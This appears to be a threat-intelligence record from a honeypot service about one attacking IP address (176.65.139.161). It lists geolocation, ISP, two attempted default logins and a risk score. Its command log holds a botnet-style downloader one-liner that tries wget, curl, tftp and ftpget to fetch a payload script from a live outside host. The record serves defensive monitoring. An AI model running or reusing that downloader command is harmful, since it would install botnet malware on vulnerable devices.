TROYANOSYVIRUS
Active Threat: LOW

176.65.139.161

Country of Origin: 🇱🇺 LU
First Detection: 4/28/2026
Last Activity: 4/28/2026
ISP: Offshore LC
Total Attacks: 15
Ports: 1
Attack Types: 1
Malware: 1

Geolocation

Country: 🇱🇺 LU
City: Unknown
ASN: AS214472
ISP: Offshore LC

Attack Types

ssh_telnet_honeypot

Attacked Ports

23

Associated Malware

Attempted Credentials

admin/1234 (1x)
root/12345 (1x)

Executed Commands

$ guest
2x
$ cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;wget http://89.190.158.132:7231/bins.sh || curl -O http://89.190.158.132:7231/bins.sh || busybox wget http://89.190.158.132:7231/bins.sh || busybox tftp 89.190.158.132 -c get bins.sh || busybox tftp -r bins.sh -g 89.190.158.132 -l bins.sh || busybox ftpget -v -u anonymous -p anonymous -P 21 89.190.158.132 bins.sh bins.sh || tftp 89.190.158.132 -c get bins.sh || tftp -r bins.sh -g 89.190.158.132 -l bins.sh || ftpget -v -u anonymous -p anonymou
1x
$ uname -m
1x

Shodan InternetDB Exposure

InternetDB data, not real-time

Ports: 22
CPEs:
cpe:/o:canonical:ubuntu_linux
cpe:/a:openbsd:openssh:8.9p1

Risk Assessment

25/100 (scale: Low, Medium, High, Critical)